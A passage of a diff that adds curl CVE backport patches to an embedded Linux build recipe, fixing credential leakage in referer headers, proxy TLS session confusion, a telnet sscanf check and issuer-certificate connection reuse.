+-      result = CURLE_SSL_INVALIDCERTSTATUS;
+-      goto end;
+-    }
++  /* Find the single OCSP response corresponding to the certificate ID */
++  ret = OCSP_resp_find_status(br, id, &cert_status, &crl_reason, &rev,
++                              &thisupd, &nextupd);
++  OCSP_CERTID_free(id);
++  if(ret != 1) {
++    failf(data, "Could not find certificate ID in OCSP response");
++    result = CURLE_SSL_INVALIDCERTSTATUS;
++    goto end;
++  }
+ 
+-    infof(data, "SSL certificate status: %s (%d)\n",
+-          OCSP_cert_status_str(cert_status), cert_status);
++  /* Validate the corresponding single OCSP response */
++  if(!OCSP_check_validity(thisupd, nextupd, 300L, -1L)) {
++    failf(data, "OCSP response has expired");
++    result = CURLE_SSL_INVALIDCERTSTATUS;
++    goto end;
++  }
+ 
+-    switch(cert_status) {
+-      case V_OCSP_CERTSTATUS_GOOD:
+-        break;
++  infof(data, "SSL certificate status: %s (%d)\n",
++        OCSP_cert_status_str(cert_status), cert_status);
+ 
+-      case V_OCSP_CERTSTATUS_REVOKED:
+-        result = CURLE_SSL_INVALIDCERTSTATUS;
++  switch(cert_status) {
++  case V_OCSP_CERTSTATUS_GOOD:
++    break;
+ 
+-        failf(data, "SSL certificate revocation reason: %s (%d)",
+-              OCSP_crl_reason_str(crl_reason), crl_reason);
+-        goto end;
++  case V_OCSP_CERTSTATUS_REVOKED:
++    result = CURLE_SSL_INVALIDCERTSTATUS;
++    failf(data, "SSL certificate revocation reason: %s (%d)",
++          OCSP_crl_reason_str(crl_reason), crl_reason);
++    goto end;
+ 
+-      case V_OCSP_CERTSTATUS_UNKNOWN:
+-        result = CURLE_SSL_INVALIDCERTSTATUS;
+-        goto end;
+-    }
++  case V_OCSP_CERTSTATUS_UNKNOWN:
++  default:
++    result = CURLE_SSL_INVALIDCERTSTATUS;
++    goto end;
+   }
+ 
+ end:
+-- 
+2.26.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22876.patch b/meta/recipes-support/curl/curl/CVE-2021-22876.patch
new file mode 100644
index 0000000000..fc396aabef
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22876.patch
@@ -0,0 +1,59 @@
+transfer: strip credentials from the auto-referer header field
+
+CVE-2021-22876
+
+Patch taken from Ubuntu curl 7.68.0-1ubuntu2.5.
+
+Bug: https://curl.se/docs/CVE-2021-22876.html
+Upstream-Status: backport
+---
+ lib/transfer.c | 25 +++++++++++++++++++++++--
+ 1 file changed, 23 insertions(+), 2 deletions(-)
+
+diff --git a/lib/transfer.c b/lib/transfer.c
+index e76834eb3..744e1c00b 100644
+--- a/lib/transfer.c
++++ b/lib/transfer.c
+@@ -1570,6 +1570,9 @@ CURLcode Curl_follow(struct Curl_easy *data,
+       data->set.followlocation++; /* count location-followers */
+ 
+       if(data->set.http_auto_referer) {
++        CURLU *u;
++        char *referer;
++
+         /* We are asked to automatically set the previous URL as the referer
+            when we get the next URL. We pick the ->url field, which may or may
+            not be 100% correct */
+@@ -1579,9 +1582,27 @@ CURLcode Curl_follow(struct Curl_easy *data,
+           data->change.referer_alloc = FALSE;
+         }
+ 
+-        data->change.referer = strdup(data->change.url);
+-        if(!data->change.referer)
++        /* Make a copy of the URL without crenditals and fragment */
++        u = curl_url();
++        if(!u)
++          return CURLE_OUT_OF_MEMORY;
++
++        uc = curl_url_set(u, CURLUPART_URL, data->change.url, 0);
++        if(!uc)
++          uc = curl_url_set(u, CURLUPART_FRAGMENT, NULL, 0);
++        if(!uc)
++          uc = curl_url_set(u, CURLUPART_USER, NULL, 0);
++        if(!uc)
++          uc = curl_url_set(u, CURLUPART_PASSWORD, NULL, 0);
++        if(!uc)
++          uc = curl_url_get(u, CURLUPART_URL, &referer, 0);
++
++        curl_url_cleanup(u);
++
++        if(uc || referer == NULL)
+           return CURLE_OUT_OF_MEMORY;
++
++        data->change.referer = referer;
+         data->change.referer_alloc = TRUE; /* yes, free this later */
+       }
+     }
+-- 
+2.20.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22890.patch b/meta/recipes-support/curl/curl/CVE-2021-22890.patch
new file mode 100644
index 0000000000..8c0ecbfe7f
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22890.patch
@@ -0,0 +1,464 @@
+vtls: add 'isproxy' argument to Curl_ssl_get/addsessionid()
+
+To make sure we set and extract the correct session.
+
+Patch taken from Ubuntu curl 7.68.0-1ubuntu2.5.
+
+CVE-2021-22890
+
+Reported-by: Mingtao Yang
+Bug: https://curl.se/docs/CVE-2021-22890.html
+Upstream-Status: backport
+---
+ lib/vtls/bearssl.c   |  9 +++++---
+ lib/vtls/gtls.c      |  9 +++++---
+ lib/vtls/mbedtls.c   |  8 ++++---
+ lib/vtls/mesalink.c  |  9 +++++---
+ lib/vtls/openssl.c   | 52 ++++++++++++++++++++++++++++++++++----------
+ lib/vtls/schannel.c  | 10 +++++----
+ lib/vtls/sectransp.c |  9 ++++----
+ lib/vtls/vtls.c      |  9 ++++++--
+ lib/vtls/vtls.h      |  2 ++
+ lib/vtls/wolfssl.c   |  8 ++++---
+ 10 files changed, 88 insertions(+), 37 deletions(-)
+
+diff --git a/lib/vtls/bearssl.c b/lib/vtls/bearssl.c
+index 67f945831..32cb0a4c2 100644
+--- a/lib/vtls/bearssl.c
++++ b/lib/vtls/bearssl.c
+@@ -372,7 +372,8 @@ static CURLcode bearssl_connect_step1(struct connectdata *conn, int sockindex)
+     void *session;
+ 
+     Curl_ssl_sessionid_lock(conn);
+-    if(!Curl_ssl_getsessionid(conn, &session, NULL, sockindex)) {
++    if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++                              &session, NULL, sockindex)) {
+       br_ssl_engine_set_session_parameters(&BACKEND->ctx.eng, session);
+       infof(data, "BearSSL: re-using session ID\n");
+     }
+@@ -560,10 +561,12 @@ static CURLcode bearssl_connect_step3(struct connectdata *conn, int sockindex)
+       return CURLE_OUT_OF_MEMORY;
+     br_ssl_engine_get_session_parameters(&BACKEND->ctx.eng, session);
+     Curl_ssl_sessionid_lock(conn);
+-    incache = !(Curl_ssl_getsessionid(conn, &oldsession, NULL, sockindex));
++    incache = !(Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++                                      &oldsession, NULL, sockindex));
+     if(incache)
+       Curl_ssl_delsessionid(conn, oldsession);
+-    ret = Curl_ssl_addsessionid(conn, session, 0, sockindex);
++    ret = Curl_ssl_addsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++                                session, 0, sockindex);
+     Curl_ssl_sessionid_unlock(conn);
+     if(ret) {
+       free(session);
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 5f740eeba..46e149c7d 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -937,7 +937,8 @@ gtls_connect_step1(struct connectdata *conn,
+     size_t ssl_idsize;
+ 
+     Curl_ssl_sessionid_lock(conn);
+-    if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, &ssl_idsize, sockindex)) {
++    if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++                              &ssl_sessionid, &ssl_idsize, sockindex)) {
+       /* we got a session id, use it! */
+       gnutls_session_set_data(session, ssl_sessionid, ssl_idsize);
+ 
+@@ -1485,7 +1486,8 @@ gtls_connect_step3(struct connectdata *conn,
+       gnutls_session_get_data(session, connect_sessionid, &connect_idsize);
+ 
+       Curl_ssl_sessionid_lock(conn);
+-      incache = !(Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL,
++      incache = !(Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++                                        &ssl_sessionid, NULL,
+                                         sockindex));
+       if(incache) {
+         /* there was one before in the cache, so instead of risking that the
+@@ -1494,7 +1496,8 @@ gtls_connect_step3(struct connectdata *conn,
+       }
+ 
+       /* store this session id */
+-      result = Curl_ssl_addsessionid(conn, connect_sessionid, connect_idsize,
++      result = Curl_ssl_addsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++                                     connect_sessionid, connect_idsize,
+                                      sockindex);
+       Curl_ssl_sessionid_unlock(conn);
+       if(result) {
+diff --git a/lib/vtls/mbedtls.c b/lib/vtls/mbedtls.c
+index f057315f3..19df8478e 100644
+--- a/lib/vtls/mbedtls.c
++++ b/lib/vtls/mbedtls.c
+@@ -453,7 +453,8 @@ mbed_connect_step1(struct connectdata *conn,
+     void *old_session = NULL;
+ 
+     Curl_ssl_sessionid_lock(conn);
+-    if(!Curl_ssl_getsessionid(conn, &old_session, NULL, sockindex)) {
++    if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++                              &old_session, NULL, sockindex)) {
+       ret = mbedtls_ssl_set_session(&BACKEND->ssl, old_session);
+       if(ret) {
+         Curl_ssl_sessionid_unlock(conn);
+@@ -709,6 +710,7 @@ mbed_connect_step3(struct connectdata *conn,
+     int ret;
+     mbedtls_ssl_session *our_ssl_sessionid;
+     void *old_ssl_sessionid = NULL;
++    bool isproxy = SSL_IS_PROXY() ? TRUE : FALSE;
+ 
+     our_ssl_sessionid = malloc(sizeof(mbedtls_ssl_session));
+     if(!our_ssl_sessionid)
+@@ -727,10 +729,10 @@ mbed_connect_step3(struct connectdata *conn,
+ 
+     /* If there's already a matching session in the cache, delete it */
+     Curl_ssl_sessionid_lock(conn);
+-    if(!Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL, sockindex))
++    if(!Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid, NULL, sockindex))
+       Curl_ssl_delsessionid(conn, old_ssl_sessionid);
+ 
+-    retcode = Curl_ssl_addsessionid(conn, our_ssl_sessionid, 0, sockindex);
++    retcode = Curl_ssl_addsessionid(conn, isproxy, our_ssl_sessionid, 0, sockindex);
+     Curl_ssl_sessionid_unlock(conn);
+     if(retcode) {
+       mbedtls_ssl_session_free(our_ssl_sessionid);
+diff --git a/lib/vtls/mesalink.c b/lib/vtls/mesalink.c
+index cab1e390b..79d1e3dfa 100644
+--- a/lib/vtls/mesalink.c
++++ b/lib/vtls/mesalink.c
+@@ -263,7 +263,8 @@ mesalink_connect_step1(struct connectdata *conn, int sockindex)
+     void *ssl_sessionid = NULL;
+ 
+     Curl_ssl_sessionid_lock(conn);
+-    if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
++    if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++                              &ssl_sessionid, NULL, sockindex)) {
+       /* we got a session id, use it! */
+       if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
+         Curl_ssl_sessionid_unlock(conn);
+@@ -347,12 +348,14 @@ mesalink_connect_step3(struct connectdata *conn, int sockindex)
+     bool incache;
+     SSL_SESSION *our_ssl_sessionid;
+     void *old_ssl_sessionid = NULL;
++    bool inproxy = SSL_IS_PROXY() ? TRUE : FALSE;
+ 
+     our_ssl_sessionid = SSL_get_session(BACKEND->handle);
+ 
+     Curl_ssl_sessionid_lock(conn);
+     incache =
+-      !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL, sockindex));
++      !(Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid,
++                              NULL, sockindex));
+     if(incache) {
+       if(old_ssl_sessionid != our_ssl_sessionid) {
+         infof(data, "old SSL session ID is stale, removing\n");
+@@ -363,7 +366,7 @@ mesalink_connect_step3(struct connectdata *conn, int sockindex)
+ 
+     if(!incache) {
+       result = Curl_ssl_addsessionid(
+-        conn, our_ssl_sessionid, 0 /* unknown size */, sockindex);
++        conn, isproxy, our_ssl_sessionid, 0 /* unknown size */, sockindex);
+       if(result) {
+         Curl_ssl_sessionid_unlock(conn);
+         failf(data, "failed to store ssl session");
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 1d09cadca..64f43605a 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -422,12 +422,23 @@ static int ossl_get_ssl_conn_index(void)
+  */
+ static int ossl_get_ssl_sockindex_index(void)
+ {
+-  static int ssl_ex_data_sockindex_index = -1;
+-  if(ssl_ex_data_sockindex_index < 0) {
+-    ssl_ex_data_sockindex_index = SSL_get_ex_new_index(0, NULL, NULL, NULL,
+-        NULL);
++  static int sockindex_index = -1;
++  if(sockindex_index < 0) {
++    sockindex_index = SSL_get_ex_new_index(0, NULL, NULL, NULL, NULL);
+   }
+-  return ssl_ex_data_sockindex_index;
++  return sockindex_index;
++}
++
++/* Return an extra data index for proxy boolean.
++ * This index can be used with SSL_get_ex_data() and SSL_set_ex_data().
++ */
++static int ossl_get_proxy_index(void)
++{
++  static int proxy_index = -1;
++  if(proxy_index < 0) {
++    proxy_index = SSL_get_ex_new_index(0, NULL, NULL, NULL, NULL);
++  }
++  return proxy_index;
+ }
+ 
+ static int passwd_callback(char *buf, int num, int encrypting,
+@@ -1079,7 +1090,8 @@ static int Curl_ossl_init(void)
+ #endif
+ 
+   /* Initialize the extra data indexes */
+-  if(ossl_get_ssl_conn_index() < 0 || ossl_get_ssl_sockindex_index() < 0)
++  if(ossl_get_ssl_conn_index() < 0 || ossl_get_ssl_sockindex_index() < 0 ||
++     ossl_get_proxy_index() < 0)
+     return 0;
+ 
+   return 1;
+@@ -2341,8 +2353,10 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
+   curl_socket_t *sockindex_ptr;
+   int connectdata_idx = ossl_get_ssl_conn_index();
+   int sockindex_idx = ossl_get_ssl_sockindex_index();
++  int proxy_idx = ossl_get_proxy_index();
++  bool isproxy;
+ 
+-  if(connectdata_idx < 0 || sockindex_idx < 0)
++  if(connectdata_idx < 0 || sockindex_idx < 0 || proxy_idx < 0)
+     return 0;
+ 
+   conn = (struct connectdata*) SSL_get_ex_data(ssl, connectdata_idx);
+@@ -2355,13 +2369,18 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
+   sockindex_ptr = (curl_socket_t*) SSL_get_ex_data(ssl, sockindex_idx);
+   sockindex = (int)(sockindex_ptr - conn->sock);
+ 
++  isproxy = SSL_get_ex_data(ssl, proxy_idx) ? TRUE : FALSE;
++
+   if(SSL_SET_OPTION(primary.sessionid)) {
+     bool incache;
+     void *old_ssl_sessionid = NULL;
+ 
+     Curl_ssl_sessionid_lock(conn);
+-    incache = !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL,
+-                                      sockindex));
++    if(isproxy)
++      incache = FALSE;
++    else
++      incache = !(Curl_ssl_getsessionid(conn, isproxy,
++                                        &old_ssl_sessionid, NULL, sockindex));
+     if(incache) {
+       if(old_ssl_sessionid != ssl_sessionid) {
+         infof(data, "old SSL session ID is stale, removing\n");
+@@ -2371,7 +2390,7 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
+     }
+ 
+     if(!incache) {
+-      if(!Curl_ssl_addsessionid(conn, ssl_sessionid,
++      if(!Curl_ssl_addsessionid(conn, isproxy, ssl_sessionid,
+                                       0 /* unknown size */, sockindex)) {
+         /* the session has been put into the session cache */
+         res = 1;
+@@ -2868,16 +2887,25 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+     void *ssl_sessionid = NULL;
+     int connectdata_idx = ossl_get_ssl_conn_index();
+     int sockindex_idx = ossl_get_ssl_sockindex_index();
++    int proxy_idx = ossl_get_proxy_index();
+ 
+-    if(connectdata_idx >= 0 && sockindex_idx >= 0) {
++    if(connectdata_idx >= 0 && sockindex_idx >= 0 && proxy_idx >= 0) {
+       /* Store the data needed for the "new session" callback.
+        * The sockindex is stored as a pointer to an array element. */
+       SSL_set_ex_data(BACKEND->handle, connectdata_idx, conn);
+       SSL_set_ex_data(BACKEND->handle, sockindex_idx, conn->sock + sockindex);
++#ifndef CURL_DISABLE_PROXY
++      SSL_set_ex_data(BACKEND->handle, proxy_idx, SSL_IS_PROXY() ? (void *) 1:
++                      NULL);
++#else
++      SSL_set_ex_data(BACKEND->handle, proxy_idx, NULL);
++#endif
++
+     }
+ 
+     Curl_ssl_sessionid_lock(conn);
+-    if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
++    if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++                              &ssl_sessionid, NULL, sockindex)) {
+       /* we got a session id, use it! */
+       if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
+         Curl_ssl_sessionid_unlock(conn);
+diff --git a/lib/vtls/schannel.c b/lib/vtls/schannel.c
+index f665ee340..a354ce95d 100644
+--- a/lib/vtls/schannel.c
++++ b/lib/vtls/schannel.c
+@@ -487,7 +487,8 @@ schannel_connect_step1(struct connectdata *conn, int sockindex)
+   /* check for an existing re-usable credential handle */
+   if(SSL_SET_OPTION(primary.sessionid)) {
+     Curl_ssl_sessionid_lock(conn);
+-    if(!Curl_ssl_getsessionid(conn, (void **)&old_cred, NULL, sockindex)) {
++    if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++                              (void **)&old_cred, NULL, sockindex)) {
+       BACKEND->cred = old_cred;
+       DEBUGF(infof(data, "schannel: re-using existing credential handle\n"));
+ 
+@@ -1193,8 +1194,9 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
+   struct ssl_connect_data *connssl = &conn->ssl[sockindex];
+   SECURITY_STATUS sspi_status = SEC_E_OK;
+   CERT_CONTEXT *ccert_context = NULL;
++  bool isproxy = SSL_IS_PROXY();
+ #ifdef DEBUGBUILD
+-  const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
++  const char * const hostname = isproxy ? conn->http_proxy.host.name :
+     conn->host.name;
+ #endif
+ #ifdef HAS_ALPN
+@@ -1268,7 +1270,7 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
+     struct curl_schannel_cred *old_cred = NULL;
+ 
+     Curl_ssl_sessionid_lock(conn);
+-    incache = !(Curl_ssl_getsessionid(conn, (void **)&old_cred, NULL,
++    incache = !(Curl_ssl_getsessionid(conn, isproxy, (void **)&old_cred, NULL,
+                                       sockindex));
+     if(incache) {
+       if(old_cred != BACKEND->cred) {
+@@ -1280,7 +1282,7 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
+       }
+     }
+     if(!incache) {
+-      result = Curl_ssl_addsessionid(conn, (void *)BACKEND->cred,
++      result = Curl_ssl_addsessionid(conn, isproxy, (void *)BACKEND->cred,
+                                      sizeof(struct curl_schannel_cred),
+                                      sockindex);
+       if(result) {
+diff --git a/lib/vtls/sectransp.c b/lib/vtls/sectransp.c
+index 7dd028fb7..9c67d465a 100644
+--- a/lib/vtls/sectransp.c
++++ b/lib/vtls/sectransp.c
+@@ -1376,7 +1376,8 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+   const char * const ssl_cafile = SSL_CONN_CONFIG(CAfile);
+   const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
+   char * const ssl_cert = SSL_SET_OPTION(cert);
+-  const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
++  bool isproxy = SSL_IS_PROXY();
++  const char * const hostname = isproxy ? conn->http_proxy.host.name :
+     conn->host.name;
+   const long int port = SSL_IS_PROXY() ? conn->port : conn->remote_port;
+ #ifdef ENABLE_IPV6
+@@ -1584,7 +1585,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+ 
+ #ifdef USE_NGHTTP2
+       if(data->set.httpversion >= CURL_HTTP_VERSION_2 &&
+-         (!SSL_IS_PROXY() || !conn->bits.tunnel_proxy)) {
++         (!isproxy || !conn->bits.tunnel_proxy)) {
+         CFArrayAppendValue(alpnArr, CFSTR(NGHTTP2_PROTO_VERSION_ID));
+         infof(data, "ALPN, offering %s\n", NGHTTP2_PROTO_VERSION_ID);
+       }
+@@ -1916,7 +1917,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+     size_t ssl_sessionid_len;
+ 
+     Curl_ssl_sessionid_lock(conn);
+-    if(!Curl_ssl_getsessionid(conn, (void **)&ssl_sessionid,
++    if(!Curl_ssl_getsessionid(conn, isproxy, (void **)&ssl_sessionid,
+                               &ssl_sessionid_len, sockindex)) {
+       /* we got a session id, use it! */
+       err = SSLSetPeerID(BACKEND->ssl_ctx, ssl_sessionid, ssl_sessionid_len);
+@@ -1944,7 +1945,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+         return CURLE_SSL_CONNECT_ERROR;
+       }
+ 
+-      result = Curl_ssl_addsessionid(conn, ssl_sessionid, ssl_sessionid_len,
++      result = Curl_ssl_addsessionid(conn, isproxy, ssl_sessionid, ssl_sessionid_len,
+                                      sockindex);
+       Curl_ssl_sessionid_unlock(conn);
+       if(result) {
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index dfefa1bd5..aaf73ef8f 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -305,6 +305,7 @@ void Curl_ssl_sessionid_unlock(struct connectdata *conn)
+  * there's one suitable, it is provided. Returns TRUE when no entry matched.
+  */
+ bool Curl_ssl_getsessionid(struct connectdata *conn,
++                           const bool isProxy,
+                            void **ssl_sessionid,
+                            size_t *idsize, /* set 0 if unknown */
+                            int sockindex)
+@@ -315,7 +316,6 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
+   long *general_age;
+   bool no_match = TRUE;
+ 
+-  const bool isProxy = CONNECT_PROXY_SSL();
+   struct ssl_primary_config * const ssl_config = isProxy ?
+     &conn->proxy_ssl_config :
+     &conn->ssl_config;
+@@ -324,6 +324,11 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
+   int port = isProxy ? (int)conn->port : conn->remote_port;
+   *ssl_sessionid = NULL;
+ 
++#ifdef CURL_DISABLE_PROXY
++  if(isProxy)
++    return TRUE;
++#endif
++
+   DEBUGASSERT(SSL_SET_OPTION(primary.sessionid));
+ 
+   if(!SSL_SET_OPTION(primary.sessionid))
+@@ -411,6 +416,7 @@ void Curl_ssl_delsessionid(struct connectdata *conn, void *ssl_sessionid)
+  * later on.
+  */
+ CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
++                               bool isProxy,
+                                void *ssl_sessionid,
+                                size_t idsize,
+                                int sockindex)
+@@ -423,7 +429,6 @@ CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
+   char *clone_conn_to_host;
+   int conn_to_port;
+   long *general_age;
+-  const bool isProxy = CONNECT_PROXY_SSL();
+   struct ssl_primary_config * const ssl_config = isProxy ?
+     &conn->proxy_ssl_config :
+     &conn->ssl_config;
+diff --git a/lib/vtls/vtls.h b/lib/vtls/vtls.h
+index a81b2f22d..a5e348752 100644
+--- a/lib/vtls/vtls.h
++++ b/lib/vtls/vtls.h
+@@ -202,6 +202,7 @@ void Curl_ssl_sessionid_unlock(struct connectdata *conn);
+  * under sessionid mutex).
+  */
+ bool Curl_ssl_getsessionid(struct connectdata *conn,
++                           const bool isproxy,
+                            void **ssl_sessionid,
+                            size_t *idsize, /* set 0 if unknown */
+                            int sockindex);
+@@ -211,6 +212,7 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
+  * object with cache (e.g. incrementing refcount on success)
+  */
+ CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
++                               const bool isProxy,
+                                void *ssl_sessionid,
+                                size_t idsize,
+                                int sockindex);
+diff --git a/lib/vtls/wolfssl.c b/lib/vtls/wolfssl.c
+index 8c2d3f4a2..dd9f907ff 100644
+--- a/lib/vtls/wolfssl.c
++++ b/lib/vtls/wolfssl.c
+@@ -392,7 +392,8 @@ wolfssl_connect_step1(struct connectdata *conn,
+     void *ssl_sessionid = NULL;
+ 
+     Curl_ssl_sessionid_lock(conn);
+-    if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
++    if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++                              &ssl_sessionid, NULL, sockindex)) {
+       /* we got a session id, use it! */
+       if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
+         char error_buffer[WOLFSSL_MAX_ERROR_SZ];
+@@ -618,9 +619,10 @@ wolfssl_connect_step3(struct connectdata *conn,
+     void *old_ssl_sessionid = NULL;
+ 
+     our_ssl_sessionid = SSL_get_session(BACKEND->handle);
++    bool isproxy = SSL_IS_PROXY() ? TRUE : FALSE;
+ 
+     Curl_ssl_sessionid_lock(conn);
+-    incache = !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL,
++    incache = !(Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid, NULL,
+                                       sockindex));
+     if(incache) {
+       if(old_ssl_sessionid != our_ssl_sessionid) {
+@@ -631,7 +633,7 @@ wolfssl_connect_step3(struct connectdata *conn,
+     }
+ 
+     if(!incache) {
+-      result = Curl_ssl_addsessionid(conn, our_ssl_sessionid,
++      result = Curl_ssl_addsessionid(conn, isproxy, our_ssl_sessionid,
+                                      0 /* unknown size */, sockindex);
+       if(result) {
+         Curl_ssl_sessionid_unlock(conn);
+-- 
+2.20.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22898.patch b/meta/recipes-support/curl/curl/CVE-2021-22898.patch
new file mode 100644
index 0000000000..0800e10175
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22898.patch
@@ -0,0 +1,26 @@
+From 39ce47f219b09c380b81f89fe54ac586c8db6bde Mon Sep 17 00:00:00 2001
+From: Harry Sintonen <sintonen@iki.fi>
+Date: Fri, 7 May 2021 13:09:57 +0200
+Subject: [PATCH] telnet: check sscanf() for correct number of matches
+
+CVE: CVE-2021-22898
+Upstream-Status: Backport
+Link: https://github.com/curl/curl/commit/39ce47f219b09c380b81f89fe54ac586c8db6bde
+Bug: https://curl.se/docs/CVE-2021-22898.html
+---
+ lib/telnet.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/telnet.c b/lib/telnet.c
+index 26e0658ba9cc..fdd137fb0c04 100644
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -922,7 +922,7 @@ static void suboption(struct Curl_easy *data)
+         size_t tmplen = (strlen(v->data) + 1);
+         /* Add the variable only if it fits */
+         if(len + tmplen < (int)sizeof(temp)-6) {
+-          if(sscanf(v->data, "%127[^,],%127s", varname, varval)) {
++          if(sscanf(v->data, "%127[^,],%127s", varname, varval) == 2) {
+             msnprintf((char *)&temp[len], sizeof(temp) - len,
+                       "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
+                       CURL_NEW_ENV_VALUE, varval);
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22924.patch b/meta/recipes-support/curl/curl/CVE-2021-22924.patch
new file mode 100644
index 0000000000..68fde45ddf
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22924.patch
@@ -0,0 +1,226 @@
+Subject: [PATCH] vtls: fix connection reuse checks for issuer cert and
+ case sensitivity CVE-2021-22924
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2021-22924.html
+CVE: CVE-2021-22924
+Upstream-Status: backport from Ubuntu curl_7.68.0-1ubuntu2.6
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/url.c          |  5 +++--
+ lib/urldata.h      |  2 +-
+ lib/vtls/gtls.c    | 10 +++++-----
+ lib/vtls/nss.c     |  4 ++--
+ lib/vtls/openssl.c | 12 ++++++------
+ lib/vtls/vtls.c    | 23 ++++++++++++++++++-----
+ 6 files changed, 35 insertions(+), 21 deletions(-)
+
+diff --git a/lib/url.c b/lib/url.c
+index 47fc66aed..eebad8d32 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -3555,6 +3555,9 @@ static CURLcode create_conn(struct Curl_easy *data,
+   data->set.proxy_ssl.primary.CApath = data->set.str[STRING_SSL_CAPATH_PROXY];
+   data->set.ssl.primary.CAfile = data->set.str[STRING_SSL_CAFILE_ORIG];
+   data->set.proxy_ssl.primary.CAfile = data->set.str[STRING_SSL_CAFILE_PROXY];
++  data->set.ssl.primary.issuercert = data->set.str[STRING_SSL_ISSUERCERT_ORIG];
++  data->set.proxy_ssl.primary.issuercert =
++    data->set.str[STRING_SSL_ISSUERCERT_PROXY];
+   data->set.ssl.primary.random_file = data->set.str[STRING_SSL_RANDOM_FILE];
+   data->set.proxy_ssl.primary.random_file =
+     data->set.str[STRING_SSL_RANDOM_FILE];
+@@ -3575,8 +3578,6 @@ static CURLcode create_conn(struct Curl_easy *data,
+ 
+   data->set.ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
+   data->set.proxy_ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_PROXY];
+-  data->set.ssl.issuercert = data->set.str[STRING_SSL_ISSUERCERT_ORIG];
+-  data->set.proxy_ssl.issuercert = data->set.str[STRING_SSL_ISSUERCERT_PROXY];
+   data->set.ssl.cert = data->set.str[STRING_CERT_ORIG];
+   data->set.proxy_ssl.cert = data->set.str[STRING_CERT_PROXY];
+   data->set.ssl.cert_type = data->set.str[STRING_CERT_TYPE_ORIG];
+diff --git a/lib/urldata.h b/lib/urldata.h
+index fbb8b645e..615fbf369 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -224,6 +224,7 @@ struct ssl_primary_config {
+   long version_max;      /* max supported version the client wants to use*/
+   char *CApath;          /* certificate dir (doesn't work on windows) */
+   char *CAfile;          /* certificate to verify peer against */
++  char *issuercert;      /* optional issuer certificate filename */
+   char *clientcert;
+   char *random_file;     /* path to file containing "random" data */
+   char *egdsocket;       /* path to file containing the EGD daemon socket */
